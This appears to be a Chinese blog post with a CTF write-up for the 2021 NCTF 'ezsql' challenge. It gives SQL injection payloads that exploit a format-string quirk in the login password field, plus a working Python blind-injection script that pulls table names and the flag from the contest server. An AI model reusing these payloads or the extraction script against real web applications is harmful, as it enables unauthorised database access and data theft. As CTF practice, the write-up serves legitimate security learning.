Posted Updated a minute read (About 184 words)

2021NCTF

ezsql

格式化字符串漏洞,之前hack.lu做过payload是

password=1%1$') or 1=1#&name=a
NCTF{3v3ryth1ng_not_fantast1c_:)}

然后接下来就是常规的盲注了

password=1%1$') or substr(database(),1,1)>0#&name=a
payload=f"1%1$') or substr(({change_pa}),{i},1)>{mid}#"
表名:
NcTF,users
import requests
url="http://129.211.173.64:3080/login.php"
s=requests.session()

def sql_in(change_pa):
    database = ""
    for i in range(1,10000):
        low=0
        high=264
        mid = (low + high) // 2
        while (low < high):
            payload=f"1%1$') or ascii(substr(({change_pa}),{i},1))>{mid}#"
            data={"password":payload,"name":"a"}
            r=s.post(url=url,data=data).text
            #print(data)
            #print(r)
            if "NCTF{3v3ryth1" in r:
                low=mid+1
            else:
                high=mid
            mid=(low+high)//2
        if (mid == 0 or mid == 264):
            break
        database += chr(mid)
        print(database)

if __name__=="__main__":
    #data="database()"
    #data="select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
    #data = 'select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x4e635446'
    data='select/**/`fl@g`/**/from/**/NcTF limit 1,1'
    #data="version()"
    sql_in(data)

2021NCTF

http://example.com/2021/11/29/2021NCTF/

Author

vague huang

Posted on

2021-11-29

Updated on

2021-11-29

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×